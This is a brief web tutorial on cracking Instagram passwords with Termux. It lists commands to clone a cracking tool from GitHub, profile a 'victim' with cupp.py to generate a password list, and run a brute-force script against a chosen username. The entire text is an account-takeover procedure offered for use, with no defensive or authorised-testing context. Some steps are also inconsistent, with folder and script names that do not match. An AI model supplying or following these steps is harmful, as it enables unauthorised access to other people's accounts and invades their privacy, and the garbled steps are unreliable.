Instagram Password Hacking using Termux Tools - Jeffic

Instacrack intallation steps:

  • Open termux app and update
  • pkg update
  • pkg install python3
  • pkg install python
  • pkg install git
  • git clone https://github.com/JTECHCODE/crackinsta.git
  • Tool Installed
  • ls (lit all folders)
  • now instacrack folder appears
  • cd instacrack
  • pip install requests
  • pip install bs4
cupp.py tool used to create password list
  • python3 cupp.py
  • python3 cupp.py -h
  • python3 cupp.py -i
                                      

                     
  • Now password list created for victim
  • Change the password file name as pass.txt
  • mv oldname.txt pass.txt
  • mv filename.txt pass.txt
  • Open the file content
  • cat pass.txt 
instacrack.py tool used for bruteforce attack
  • python crack.py
  • Enter the username
  • put the second between password
  • Now the tool started to crack the password
  • Now you wait for the right password
               

Comments